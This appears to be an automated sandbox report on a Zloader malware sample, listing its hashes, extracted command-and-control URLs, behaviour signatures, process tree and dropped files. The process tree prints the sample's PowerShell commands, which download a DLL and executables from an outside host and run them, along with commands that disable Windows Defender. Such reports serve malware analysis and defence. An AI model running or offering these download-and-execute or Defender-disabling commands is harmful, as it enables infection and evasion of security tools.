Analysis

  • max time kernel
    78s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    16-08-2021 17:59

General

  • Target

    8f87fe90d589a4fa73cff6a242fe222b.exe

  • Size

    165KB

  • MD5

    8f87fe90d589a4fa73cff6a242fe222b

  • SHA1

    381e33872d0f6f1a7233beeb6e9524435c2a9ab6

  • SHA256

    edaabcb2e82b51c9b8df54dc82afc494bff804b1b187c4657ab583e8ca0bd052

  • SHA512

    f0ce6885ac47429df5a1a0779c9a455300d77284ef71ff1e344afe2344513b430705ce50d62fceddb051cb5df8b67e1c4969b377413647f4cbe23fc87351aca0

Malware Config

Extracted

Family

zloader

Botnet

ivan

Campaign

ivan

C2

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain
rsa_pubkey.plain

Signatures

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe
    "C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:636
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c start.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest https://pornotublovers.com/JavaP.dll -OutFile JavaP.dll
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4000
      • C:\Windows\system32\regsvr32.exe
        regsvr32 JavaP.dll
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3788
        • C:\Windows\SysWOW64\regsvr32.exe
          JavaP.dll
          4⤵
          • Loads dropped DLL
          PID:2680
          • C:\Windows\SysWOW64\msiexec.exe
            msiexec.exe
            5⤵
              PID:1252
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
          3⤵
            PID:3988
          • C:\Windows\system32\cmd.exe
            cmd /c nsudo.bat
            3⤵
              PID:696
              • C:\Windows\system32\cacls.exe
                "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                4⤵
                  PID:4036
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
                  4⤵
                    PID:3520
                  • C:\Users\Admin\AppData\Roaming\javase.exe
                    javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:2128
                    • C:\Users\Admin\AppData\Roaming\javase.exe
                      javase -U:T sc config WinDefend start= disabled
                      4⤵
                        PID:3880

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Persistence

                Registry Run Keys / Startup Folder

                1
                T1060

                Defense Evasion

                Modify Registry

                1
                T1112

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                  MD5

                  42d4b1d78e6e092af15c7aef34e5cf45

                  SHA1

                  6cf9d0e674430680f67260194d3185667a2bb77b

                  SHA256

                  c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

                  SHA512

                  d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  MD5

                  0cd0a4725424c6df02ba40663fe0a2e6

                  SHA1

                  e76591c9570c1d3c33a1e7f9f2c650a30e6f0224

                  SHA256

                  80f165cabec26b89962bed756c8478b5510f8da3740c46faf45e932a355a6e12

                  SHA512

                  9ea8888e38b986c3fd651ccabb22666f17517a208c92feca4cc8660a599c98bb8cf4764afda2e524014e682f5979649d05af784be5b6950073ec1af55e54939c

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  MD5

                  81a4f63ee9c9c9fd7a1d97d03641813f

                  SHA1

                  3e3ce1ac1bd5457c7d3aa1260d2ace3f9f39b476

                  SHA256

                  ed36d6e9e0ed6cbde1dd007db49a5a48853bc8eb3c299b9e62531089dfbf3a01

                  SHA512

                  25ab9f55ac0b67a5052a8f393d241c352ba3bbc627baef156a7e836ed6c21f6dd83d93322cc4e4d152c83bca80a1c463af28b8ba61a9bf73202a8fcd525439a7

                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
                  MD5

                  676d31dd4a8405ead757e0b72d6bd381

                  SHA1

                  789a5fc1af78a0630ae705f6dd5506dd476d9d0f

                  SHA256

                  57d69a6ca957beb5c9eed7f39d0bb56e6d3348bd510fbba10ad0c19438a712b7

                  SHA512

                  79cc7bd42feb80d9a552f2fd6145795ab1904ca7c8d4175f70f9225b04eddcc7107ebf4391eac9d578ed7b963ce192df58050e73b8eaed30e3ef89405e18028c

                • C:\Users\Admin\AppData\Roaming\JavaP.dll
                  MD5

                  23cb9715b98c53a8351d0cfb3d0a24eb

                  SHA1

                  4048470f92c65898b3e7186cc98108b74e4b2171

                  SHA256

                  bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7

                  SHA512

                  4b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1

                • C:\Users\Admin\AppData\Roaming\javase.exe
                  MD5

                  5cae01aea8ed390ce9bec17b6c1237e4

                  SHA1

                  3a80a49efaac5d839400e4fb8f803243fb39a513

                  SHA256

                  19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                  SHA512

                  c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                • C:\Users\Admin\AppData\Roaming\javase.exe
                  MD5

                  5cae01aea8ed390ce9bec17b6c1237e4

                  SHA1

                  3a80a49efaac5d839400e4fb8f803243fb39a513

                  SHA256

                  19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                  SHA512

                  c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                • C:\Users\Admin\AppData\Roaming\nsudo.bat
                  MD5

                  6f10d512d4cbb527fd26ae266d0a4aef

                  SHA1

                  6e42d51ff2d42c5f999943b329a655e901ea4b32

                  SHA256

                  b37efaf69f5484fd2e4ec9c83553b9788e39a10fc4390065c29d59f770f34943

                  SHA512

                  4f66e8435b8439ace551ad8a70483926891ff3f55b27688602b2e0c58999054bd430308879374f4e8c990a91c3e9cc9cd78b6d355d4370051528bce536e1028e

                • \Users\Admin\AppData\Roaming\JavaP.dll
                  MD5

                  23cb9715b98c53a8351d0cfb3d0a24eb

                  SHA1

                  4048470f92c65898b3e7186cc98108b74e4b2171

                  SHA256

                  bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7

                  SHA512

                  4b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1

                • memory/696-170-0x0000000000000000-mapping.dmp
                • memory/1252-152-0x00000000004C0000-0x00000000004E6000-memory.dmp
                  Filesize

                  152KB

                • memory/1252-143-0x0000000000000000-mapping.dmp
                • memory/2128-195-0x0000000000000000-mapping.dmp
                • memory/2680-139-0x0000000000000000-mapping.dmp
                • memory/2680-142-0x0000000010000000-0x000000001017A000-memory.dmp
                  Filesize

                  1.5MB

                • memory/2680-141-0x0000000002800000-0x0000000002801000-memory.dmp
                  Filesize

                  4KB

                • memory/2696-114-0x0000000000000000-mapping.dmp
                • memory/3520-188-0x000001D5ABEE0000-0x000001D5ABEE2000-memory.dmp
                  Filesize

                  8KB

                • memory/3520-173-0x0000000000000000-mapping.dmp
                • memory/3520-189-0x000001D5ABEE3000-0x000001D5ABEE5000-memory.dmp
                  Filesize

                  8KB

                • memory/3520-190-0x000001D5ABEE6000-0x000001D5ABEE8000-memory.dmp
                  Filesize

                  8KB

                • memory/3788-137-0x0000000000000000-mapping.dmp
                • memory/3880-197-0x0000000000000000-mapping.dmp
                • memory/3988-165-0x0000019372066000-0x0000019372068000-memory.dmp
                  Filesize

                  8KB

                • memory/3988-155-0x0000019372063000-0x0000019372065000-memory.dmp
                  Filesize

                  8KB

                • memory/3988-154-0x0000019372060000-0x0000019372062000-memory.dmp
                  Filesize

                  8KB

                • memory/3988-146-0x0000000000000000-mapping.dmp
                • memory/4000-132-0x00000203F5B36000-0x00000203F5B38000-memory.dmp
                  Filesize

                  8KB

                • memory/4000-127-0x00000203F5B33000-0x00000203F5B35000-memory.dmp
                  Filesize

                  8KB

                • memory/4000-126-0x00000203F5B30000-0x00000203F5B32000-memory.dmp
                  Filesize

                  8KB

                • memory/4000-125-0x00000203F6AA0000-0x00000203F6AA1000-memory.dmp
                  Filesize

                  4KB

                • memory/4000-121-0x00000203F5C40000-0x00000203F5C41000-memory.dmp
                  Filesize

                  4KB

                • memory/4000-116-0x0000000000000000-mapping.dmp
                • memory/4036-172-0x0000000000000000-mapping.dmp